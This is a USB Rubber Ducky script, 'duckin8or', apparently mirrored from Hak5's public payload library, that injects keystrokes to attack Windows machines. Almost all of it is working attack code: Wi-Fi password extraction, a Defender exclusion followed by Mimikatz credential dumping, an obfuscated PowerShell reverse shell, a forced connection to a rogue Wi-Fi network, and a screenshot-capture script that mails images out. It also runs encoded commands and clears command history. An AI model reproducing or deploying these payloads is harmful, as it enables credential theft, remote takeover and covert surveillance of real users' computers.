Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/general/duckin8or/payload.txt
2968 views
1
REM #############################################################################
2
REM # DuckyScript 3.0 #
3
REM # Title: _ _ _ _ #
4
REM # duckin8or >(.)__ >(.)__ >(.)__ >(.)__ #
5
REM # (___/ (___/ (___/ (___/ #
6
REM # Author: _ _ _ _ #
7
REM # irrrwin __(.)< __(.)< __(.)< __(.)< #
8
REM # \___) \___) \___) \___) #
9
REM # Compatibility: #
10
REM # Windows #
11
REM # #
12
REM # Description: #
13
REM # Choose one from 3 attack vectors: (s)creen, (u)ser or (n)etwork and #
14
REM # run a (v)anilla or (h)ardcore version of it with a button press. #
15
REM # Vanilla attacks are not intrusive and only grab data. Hardcore stuff #
16
REM # may interfere with the system and change its state to insecure. #
17
REM # In addition, Help pop-up and ATTACKMODE STORAGE are available. #
18
REM # #
19
REM # Usage: #
20
REM # 0. Insert Rubbing Duck. #
21
REM # 1. Choose payload by using a combination of |C|aps Lock, |N|um Lock #
22
REM # and |S|croll Lock as 0(OFF)/1(ON) switches. #
23
REM # 2. Press button to run the chosen payload. #
24
REM # 3. After successful execution, lock keys will start blinking. #
25
REM # 4. Press button again to reset lock keys and go back to menu. #
26
REM # 5. Enjoy. #
27
REM # #
28
REM # Payloads: #
29
REM # 0) |-|-|-| [HELP] Help. #
30
REM # 1) |-|-|S| [s][v] Proof of Pwnage pop-up and screenshot grab. #
31
REM # 2) |-|N|-| [n][v] Network info exfiltration. #
32
REM # 3) |-|N|S| [u][h] Disable AV and fetch credentials with Mimikatz. #
33
REM # 4) |C|-|-| [u][v] Open reverse shell with Powershell. #
34
REM # 5) |C|-|S| [n][h] Connect target to the rogue piƱa network. #
35
REM # 6) |C|N|-| [s][h] Persistent screenshot exfiltration. #
36
REM # 7) |C|N|S| [STOR] Storage mode. #
37
REM # #
38
REM # Help: #
39
REM # 0. Insert duckin8or. #
40
REM # 1. Press the button. #
41
REM # 2. Pop-up with brief payloads descriptions will appear. #
42
REM # #
43
REM # Tips: #
44
REM # * Start by filling out the >>> SETTINGS >>>>>> part. #
45
REM # * First letters of the Lock Keys make it easier to remember payloads. #
46
REM # F.e. to use (s)creen attack in vanilla mode press (S)croll Lock #
47
REM # only. To use it in hardcore mode, press the other two Lock Keys #
48
REM # instead. The same logic applies for (n)etwork attack and (N)um #
49
REM # Lock Key. For the (u)ser attacks, the (C)aps Lock is used. #
50
REM # * Each payload within the appropriate >> block << may be edited #
51
REM # or removed without breaking other features. #
52
REM # * Any serious application requires a properly obfuscated mimikatz bin.#
53
REM # * Be responsible. #
54
REM # #
55
REM # Kudos: #
56
REM # * RootJunky - "Three Payloads from LOCK Key Double Press" #
57
REM # * 0i41E - "EngagementDucky", "ReverseDuckyII" #
58
REM # * the-jcksn - "ducky_crab" #
59
REM # * I am Jakoby - "-RD-PineApple" #
60
REM # * Hak5 Team #
61
REM # #
62
REM # Disclaimer: #
63
REM # *This program is free software: you can redistribute it and/or modify #
64
REM # it under the terms of the GNU General Public License as published by #
65
REM # the Free Software Foundation, either version 3 of the License, or (at #
66
REM # your option) any later version.* #
67
REM # #
68
REM # *You should have received a copy of the GNU General Public License #
69
REM # along with this program. If not, see http://www.gnu.org/licenses/ * #
70
REM # #
71
REM #############################################################################
72
73
74
75
REM >>> SETTINGS >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
76
REM ~~~~~~~~~~~~ EDIT BELOW ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
77
78
DEFINE VID VID_D34D
79
DEFINE PID PID_B33F
80
DEFINE MAN MAN_Pentest
81
DEFINE PROD PROD_DUCKY
82
DEFINE SERIAL SERIAL_30062049
83
84
DEFINE CLEANUP FALSE
85
86
DEFINE LHOST 8.8.8.8
87
DEFINE LPORT 69
88
DEFINE BEACON icanhazip.com
89
90
DEFINE OUTLOOK_USER [email protected]
91
DEFINE OUTLOOK_PASS Password1!
92
93
DEFINE CRAB_DELAY_SEC 60
94
DEFINE CRAB_DURATION_MIN 10
95
96
DEFINE PINEAPPLE_SSID PineApple
97
98
REM ~~~~~~~~~~~~ EDIT ABOVE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
99
REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< SETTINGS <<<
100
101
102
REM >>> SETUP >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
103
104
EXTENSION PASSIVE_WINDOWS_DETECT
105
REM VERSION 1.0
106
REM CONFIGURATION:
107
DEFINE MAX_WAIT 150
108
DEFINE CHECK_INTERVAL 20
109
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
110
DEFINE NOT_WINDOWS 7
111
112
VAR $MAX_TRIES = MAX_WAIT
113
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
114
DELAY CHECK_INTERVAL
115
$MAX_TRIES = ($MAX_TRIES - 1)
116
END_WHILE
117
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
118
$_OS = WINDOWS
119
ELSE
120
$_OS = NOT_WINDOWS
121
END_IF
122
END_EXTENSION
123
124
IF ($_OS == NOT_WINDOWS) THEN
125
ATTACKMODE STORAGE
126
WAIT_FOR_BUTTON_PRESS
127
STOP_PAYLOAD
128
END_IF
129
130
BUTTON_DEF
131
DELAY 20
132
END_BUTTON
133
134
ATTACKMODE HID
135
DELAY 1000
136
137
FUNCTION RESET_LOCKS()
138
REM Set all Lock Keys to OFF position.
139
IF ($_CAPSLOCK_ON == TRUE ) THEN
140
CAPSLOCK
141
END_IF
142
IF ($_SCROLLLOCK_ON == TRUE ) THEN
143
SCROLLLOCK
144
END_IF
145
IF ($_NUMLOCK_ON == TRUE ) THEN
146
NUMLOCK
147
END_IF
148
END_FUNCTION
149
150
RESET_LOCKS()
151
152
REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< SETUP <<<
153
154
155
REM >>> PAYLOAD 0 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
156
REM | Open pop-up window with the Lock Keys combos cheatsheet.
157
158
FUNCTION PAYLOAD0()
159
DELAY 500
160
GUI r
161
DELAY 500
162
STRINGLN powershell
163
DELAY 500
164
STRING $l = (
165
STRING 'Choose payload -> Press one -> Press two -> Repeat',
166
STRING 'P0 [-][-][-] : This window.',
167
STRING 'P1 [-][-][N] : Network info.',
168
STRING 'P2 [-][S][-] : Proof of Pwnage.',
169
STRING 'P3 [-][S][N] : User credentials.',
170
STRING 'P4 [C][-][-] : Reverse shell.',
171
STRING 'P5 [C][-][N] : Ducky_crab.',
172
STRING 'P6 [C][S][-] : Connect2pinapple.',
173
STRING 'P7 [C][S][N] : Storage.')
174
ENTER
175
STRINGLN $l = $l -join "`n- "
176
STRINGLN powershell -WindowStyle hidden -Command "& {[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('- $l','~~~ duckin8or cheatsheet ~~~')}"
177
END_FUNCTION
178
179
REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 0 <<<
180
181
182
REM >>> PAYLOAD 1 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
183
REM | Open a proof of pwnage warning box and capture the screen. Save loot to REM | the SD card's root directyory
184
185
FUNCTION PAYLOAD1()
186
ATTACKMODE HID STORAGE
187
DELAY 5000
188
189
GUI r
190
DELAY 500
191
STRINGLN powershell -NoP -NonI -w h
192
DELAY 500
193
194
STRINGLN powershell.exe -enc JABVACAAPQAgAHcAaABvAGEAbQBpADsAJABtAD0AIgAkAFUAIABpAHMAIABjAG8AbgBzAGkAZABlAHIAZQBkACAAYwBvAG0AcAByAG8AbQBpAHMAZQBkACEAIABUAGgAaQBzACAAaQBuAGMAaQBkAGUAbgB0ACAAdwBpAGwAbAAgAGIAZQAgAHIAZQBwAG8AcgB0AGUAZAAuACIAOwAkAEwAIAA9ACAARwBlAHQALQBEAGEAdABlAA0ACgBbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAIgBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAIgApADsAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBNAGUAcwBzAGEAZwBlAEIAbwB4AF0AOgA6AFMAaABvAHcAKAAkAG0ALAAiACQATAAgAC0AIABQAHIAbwBvAGYAIABvAGYAIABDAG8AbQBwAHIAbwBtAGkAcwBlACIALAAwACwAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBNAGUAcwBzAGEAZwBlAEIAbwB4AEkAYwBvAG4AXQA6ADoARQB4AGMAbABhAG0AYQB0AGkAbwBuACkA;exit
195
DELAY 500
196
197
GUI r
198
DELAY 500
199
STRINGLN powershell -NoP -NonI -w h
200
DELAY 500
201
202
STRINGLN powershell.exe -enc JABZACAAPQAoACgAZwB3AG0AaQAgAHcAaQBuADMAMgBfAHYAbwBsAHUAbQBlACAALQBmACAAJwBsAGEAYgBlAGwAPQAnACcARABVAEMASwBZACcAJwAnACkALgBOAGEAbQBlACkAOwANAAoAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgACoAbQAuACoAcwAuAEYAKgBzADsADQAKAEEAZABkAC0AdAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIAAqAG0ALgBEAHIAKgBnADsADQAKACQAUwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAFMAeQBzAHQAZQBtAEkAbgBmAG8AcgBtAGEAdABpAG8AbgBdADoAOgBWAGkAcgB0AHUAYQBsAFMAYwByAGUAZQBuADsADQAKACQAVwAgAD0AIAAkAFMALgBXAGkAZAB0AGgAOwANAAoAJABIACAAPQAgACQAUwAuAEgAZQBpAGcAaAB0ADsADQAKACQARgAgAD0AIAAkAFMALgBMAGUAZgB0ADsADQAKACQAVAAgAD0AIAAkAFMALgBUAG8AcAA7AA0ACgAkAEIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABXACwAIAAkAEgAOwANAAoAJABHACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4ARwByAGEAcABoAGkAYwBzAF0AOgA6AEYAcgBvAG0ASQBtAGEAZwBlACgAJABCACkAOwANAAoAJABHAC4AQwBvAHAAeQBGAHIAbwBtAFMAYwByAGUAZQBuACgAJABGACwAIAAkAFQALAAgADAALAAgADAALAAgACQAQgAuAFMAaQB6AGUAKQA7AA0ACgAkAEIALgBTAGEAdgBlACgAJABZACsAIgBcAFAAcgBvAG8AZgAuAGIAbQBwACIAKQA7ACQAUgBEACAAPQAgACgAZwB3AG0AaQAgAHcAaQBuADMAMgBfAHYAbwBsAHUAbQBlACAALQBmACAAJwBsAGEAYgBlAGwAPQAnACcARABVAEMASwBZACcAJwAnACkALgBOAGEAbQBlADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0ATwBiAGoAZQBjAHQAIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAE4AYQBtAGUAcwBwAGEAYwBlACgAMQA3ACkALgBQAGEAcgBzAGUATgBhAG0AZQAoACQAUgBEACkALgBJAG4AdgBvAGsAZQBWAGUAcgBiACgAJwBFAGoAZQBjAHQAJwApADsARQB4AGkAdAA=;exit
203
DELAY 2000
204
WAIT_FOR_STORAGE_INACTIVITY
205
END_FUNCTION
206
207
REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 1 <<<
208
209
210
REM >>> PAYLOAD 2 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
211
REM | Exfiltrate network data such as public IP, local IP and WiFi credentials.
212
REM | Save loot to the SD card's root directyory
213
214
FUNCTION PAYLOAD2()
215
ATTACKMODE HID STORAGE
216
DELAY 5000
217
218
GUI r
219
DELAY 500
220
STRINGLN Powershell
221
DELAY 500
222
223
STRINGLN $pubIP=(Invoke-WebRequest icanhazip.com -UseBasicParsing).Content
224
STRINGLN $networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}
225
STRINGLN $WiFi = Out-String -InputObject ((netsh wlan show profiles) | Select-String ":(.+)$" | % {$name=$_.Matches.Groups[1].Value.Trim(); $_} | % {(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | % {$pass=$_.Matches.Groups[1].Value.Trim(); $_} | % {[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize) -Width 100
226
DELAY 100
227
STRINGLN $RD=((gwmi win32_volume -f 'label=''DUCKY''').Name + 'network.txt')
228
DELAY 100
229
STRINGLN ($WiFi + $pubIP + $networks.ipaddress[0]) | Set-Content -Path $RD
230
DELAY 200
231
STRINGLN exit
232
END_FUNCTION
233
234
REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 2 <<<
235
236
237
REM >>> PAYLOAD 3 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
238
REM | REQUIRES ADMIN PRIVILEGES. Exfiltrate users credentials with Mimikatz.
239
REM | Beware that Ducky will expose the drive and AV might pick up on any
240
REM | potential threats. Save loot to the SD card's root directyory
241
242
FUNCTION PAYLOAD3()
243
ATTACKMODE HID STORAGE
244
DELAY 5000
245
246
GUI r
247
DELAY 500
248
STRING powershell
249
DELAY 500
250
CTRL-SHIFT ENTER
251
DELAY 500
252
LEFT
253
ENTER
254
DELAY 500
255
256
STRINGLN $RD = (gwmi win32_volume -f 'label=''DUCKY''').Name
257
DELAY 100
258
STRINGLN Import-Module Defender
259
DELAY 200
260
STRINGLN Set-MpPreference -ExclusionPath $RD
261
DELAY 100
262
STRINGLN cd $RD
263
DELAY 100
264
STRINGLN .\mk.exe > $env:UserName`.txt -and type $env:UserName`.txt
265
DELAY 1500
266
STRINGLN privilege::debug
267
DELAY 200
268
STRINGLN sekurlsa::logonPasswords full
269
DELAY 666
270
STRINGLN exit
271
DELAY 100
272
STRINGLN Remove-MpPreference -ExclusionPath $RD
273
DELAY 100
274
STRINGLN exit
275
END_FUNCTION
276
277
REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 3 <<<
278
279
280
REM >>> PAYLOAD 4 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
281
REM | Open a simple TCP reverse shell through a powershell session.
282
283
FUNCTION PAYLOAD4()
284
DELAY 500
285
GUI r
286
DELAY 500
287
STRINGLN powershell -NoP -NonI -w h
288
DELAY 500
289
290
STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("
291
STRING LHOST
292
STRING ",
293
STRING LPORT
294
STRING );$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt-STriNG);$x=$z+"Ducky@PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exit
295
ENTER
296
END_FUNCTION
297
298
REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 4 <<<
299
300
301
REM >>> PAYLOAD 5 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
302
REM | Prepare an XML file with rogue Pineapple credentials and connect to it.
303
304
FUNCTION PAYLOAD5()
305
DELAY 500
306
GUI r
307
DELAY 500
308
STRINGLN powershell
309
DELAY 500
310
311
STRING $f="Home.xml";
312
STRING $SSID="
313
STRING PINEAPPLE_SSID
314
STRING ";
315
STRING $SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join'';
316
STRING $xmlfile="<?xml version=""1.0""?><WLANProfile xmlns=""http://www.microsoft.com/networking/WLAN/profile/v1""><name>$SSID</name><SSIDConfig><SSID><hex>$SSIDHEX</hex><name>$SSID</name></SSID></SSIDConfig><connectionType>ESS</connectionType><connectionMode>manual</connectionMode><MSM><security><authEncryption><authentication>open</authentication><encryption>none</encryption><useOneX>false</useOneX></authEncryption></security></MSM></WLANProfile>";$XMLFILE > ($f);netsh wlan add profile filename="$($f)";netsh wlan connect name=$SSID;exit
317
ENTER
318
END_FUNCTION
319
320
REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 5 <<<
321
322
323
REM >>> PAYLOAD 6 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
324
REM | Gives "screen crab" like capabilities to the USB rubber ducky. Creates a
325
REM | powershell script that captures screenshots and exfiltrates them via outlook,
326
REM | even after the USB rubber ducky has been removed.
327
328
FUNCTION PAYLOAD6()
329
DELAY 500
330
GUI r
331
DELAY 500
332
STRINGLN powershell
333
DELAY 200
334
STRINGLN Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser
335
DELAY 200
336
337
STRINGLN New-Item -Path 'Pictures' -Name 'screens.ps1' -ItemType file
338
DELAY 200
339
340
STRINGLN "cd C:\Users\$env:username\ `nNew-Item -Path 'C:\Users\$env:username\Pictures\Screens\' -ItemType Directory" | Out-File Pictures\screens.ps1 -Append
341
DELAY 200
342
343
STRING "`$t = new-timespan -Minutes
344
STRING CRAB_DURATION_MIN
345
STRING " | Out-File Pictures\screens.ps1 -Append
346
ENTER
347
DELAY 200
348
349
STRINGLN "`$clk = [diagnostics.stopwatch]::StartNew() `nwhile (`$clk.elapsed -lt `$t){ `n[void][reflection.assembly]::loadwithpartialname('system.windows.forms') `n`$S = [System.Windows.Forms.SystemInformation]::VirtualScreen `n`$Width = `$S.Width `n`$Height = `$S.Height `n`$Left = `$S.Left `n`$Top = `$S.top `n`$bmp = New-Object System.Drawing.Bitmap `$Width, `$Height `n`$g = [System.Drawing.Graphics]::FromImage(`$bmp) `n`$g.CopyFromScreen(`$Left, `$Top, 0, 0, `$bmp.Size) `n`$enddate = (Get-Date).tostring('ddMMyy-hh_mm_ss') `n`$fn = `$enddate + '.gif' `n`$bmp.Save('C:\Users\$env:Username\Pictures\Screens\' + `$fn) `nstart-sleep -seconds 10" | Out-File Pictures\screens.ps1 -Append
350
DELAY 200
351
352
STRING "Send-MailMessage -From
353
STRING OUTLOOK_USER
354
STRING -To
355
STRING OUTLOOK_USER
356
STRING -Subject `"Screenshot loot`" -Body `"Please find attached your screenshot update`" -Attachment `"Pictures\Screens\`$fn`" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
357
STRING OUTLOOK_USER
358
STRING , (ConvertTo-SecureString -String `"
359
STRING OUTLOOK_PASS
360
STRING `" -AsPlainText -Force))" | Out-File Pictures\screens.ps1 -Append
361
ENTER
362
DELAY 200
363
364
STRING "start-sleep -seconds
365
STRING CRAB_DELAY_SEC
366
STRING `n} `nSet-ExecutionPolicy -ExecutionPolicy Undefined -Scope CurrentUser `nGet-ChildItem Pictures\Screens -Include *.* -Recurse | ForEach {`$_.Delete()} `nRemove-Item Pictures\screens -Confirm:`$false `nRemove-Item Pictures\screens.ps1 -Force `nexit" | Out-File Pictures\screens.ps1 -Append
367
ENTER
368
DELAY 200
369
STRINGLN exit
370
DELAY 300
371
372
REM Run the prepared script.
373
GUI r
374
DELAY 500
375
STRINGLN powershell -w h -File "%USERPROFILE%\Pictures\screens.ps1"
376
DELAY 1000
377
END_FUNCTION
378
379
REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 6 <<<
380
381
382
REM >>> PAYLOAD 7 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
383
REM | Storage mode. Press button to stop sharing.
384
385
FUNCTION PAYLOAD7()
386
ATTACKMODE STORAGE
387
DELAY 5000
388
WAIT_FOR_BUTTON_PRESS
389
$_BUTTON_PUSH_RECEIVED = FALSE
390
END_FUNCTION
391
392
REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 7 <<<
393
394
395
REM >>> MAIN >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
396
REM | Constantly monitor Scroll Lock, Num Lock, and Caps Lock keys with a while
397
REM | loop and run appropriate payload when the button is pressed. All Lock keys
398
REM | will blink when finished. Press again to go back to menu.
399
400
WHILE (TRUE)
401
IF ($_BUTTON_PUSH_RECEIVED == TRUE ) THEN
402
DELAY 100
403
$_BUTTON_PUSH_RECEIVED = FALSE
404
DISABLE_BUTTON
405
SAVE_ATTACKMODE
406
407
IF (($_CAPSLOCK_ON == FALSE) && (($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE))) THEN
408
RESET_LOCKS()
409
PAYLOAD0()
410
ELSE IF (($_CAPSLOCK_ON == FALSE) && (($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == TRUE))) THEN
411
RESET_LOCKS()
412
PAYLOAD1()
413
ELSE IF (($_CAPSLOCK_ON == FALSE) && (($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == FALSE))) THEN
414
RESET_LOCKS()
415
PAYLOAD2()
416
ELSE IF (($_CAPSLOCK_ON == FALSE) && (($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == TRUE))) THEN
417
RESET_LOCKS()
418
PAYLOAD3()
419
ELSE IF (($_CAPSLOCK_ON == TRUE) && (($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE))) THEN
420
RESET_LOCKS()
421
PAYLOAD4()
422
ELSE IF (($_CAPSLOCK_ON == TRUE) && (($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == TRUE))) THEN
423
RESET_LOCKS()
424
PAYLOAD5()
425
ELSE IF (($_CAPSLOCK_ON == TRUE) && (($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == FALSE))) THEN
426
RESET_LOCKS()
427
PAYLOAD6()
428
ELSE IF (($_CAPSLOCK_ON == TRUE) && (($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == TRUE))) THEN
429
RESET_LOCKS()
430
PAYLOAD7()
431
END_IF
432
433
RESTORE_ATTACKMODE
434
DELAY 1000
435
436
IF (CLEANUP == TRUE) THEN
437
GUI r
438
DELAY 500
439
STRINGLN powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"; Remove-Item (Get-PSreadlineOption).HistorySavePath
440
END_IF
441
442
ENABLE_BUTTON
443
RESET_LOCKS()
444
$_BUTTON_PUSH_RECEIVED = FALSE
445
DELAY 100
446
WHILE ($_BUTTON_PUSH_RECEIVED == FALSE )
447
DELAY 100
448
CAPSLOCK
449
SCROLLLOCK
450
NUMLOCK
451
DELAY 100
452
CAPSLOCK
453
SCROLLLOCK
454
NUMLOCK
455
END_WHILE
456
$_BUTTON_PUSH_RECEIVED = FALSE
457
DELAY 100
458
RESET_LOCKS()
459
DELAY 100
460
END_IF
461
END_WHILE
462
463
REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< MAIN <<<
464
465